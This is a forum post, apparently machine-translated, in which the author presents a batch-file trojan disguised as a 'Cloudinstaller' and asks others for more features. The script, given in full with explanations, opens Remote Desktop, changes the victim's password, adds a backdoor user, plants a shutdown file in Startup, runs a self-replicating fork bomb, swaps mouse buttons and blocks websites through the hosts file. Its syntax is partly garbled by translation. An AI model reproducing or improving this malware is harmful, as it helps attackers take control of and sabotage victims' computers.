Does anyone have an improvement for this trojan?

ja
1

I have programmed a "small" batch Trojan.

I can't think of any more orders. Does anyone have an idea what I could add?

By the way, the Trojan is called "Roemer" (inspired by "Trojan") and is "disguised" as a cloud installer.
(The Trojan is still being converted to .exe)

About the code: I often have "cd." done because the "starter" (from the Trojan) may have put the Trojan in a folder, which has packed in a folder, etc.)

@echo off

title Cloudinstaller V.0.6

set newline = ^ & echo.

cls

echo Run as admin! / Open as an admin!

pause> NUL

cls

echo Username / Username (Example: Timon)

set / P "HUH =>"

cls

netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes

reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

cd C: \ Users \% HUH% \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup

echo shutdown -s -t 60> Friendly.bat

net user% HUH% heiligeroemer

net user Roemer roman empire / add

echo start hoesmad.bat> hoesmad.bat

Rundll32 user32, SwapMouseButton

cd C: \ Users \% HUH% \ Desktop

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

cd windows

cd System32

cd drivers

cd etc

echo 127.0.0.1 http://www.netflix.com/...etflix.com >> hosts

echo 127.0.0.1 http://www.youtube.com/...outube.com >> hosts

echo 127.0.0.1 http://www.instagram.com/...tagram.com >> hosts

echo 127.0.0.1 http://www.twitter.com >> hosts

cls

echo process completed.

pause> NUL

Explanations: So netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes

and

reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

are there to activate or allow the "remote host connection".

later I added a user so that I can get access to the user and then get access to the "main user".

If you know the person you "infected" personally, I have had the password changed.

Mousebuttons are changed

There's an "infinite CPU overload"

Websites are blocked (btw, if someone knows the command to block programs or a command that closes when the program is opened, write me)

The "victim device" is shut down after 60 seconds.

Maybe I'll add the taskkill / F / Fi "status eq running" command, but the last one.

I thank you for the help.

Le

Scriptkiddie.

What hairstyle / style of clothing does Ratched have in the series Ratched 1947? An Answer4
  • 3 answers
Pixelated Netflix quality? Blame TV or Netflix? Er Erick1792
  • 1 answer
Walking Dead (air date)? Si Silas44
  • 6 answers
Fortnite FPS Drops. New CPU or GPU? De Deeplyelian
  • 33 answers
Does anyone have the Dark Passenger speech from the series / book Dexter? Ca Cayden402
  • 1 answer
No signal on the TV (cable)? ha harmonyNeil
  • 7 answers
How do you like the Peaky Blinders series?

How do you like the Peaky Blinders series?
Looking for films like Nezha Reborn?

Looking for films like Nezha Reborn?
Broken screen how can I best explain this?

Broken screen how can I best explain this?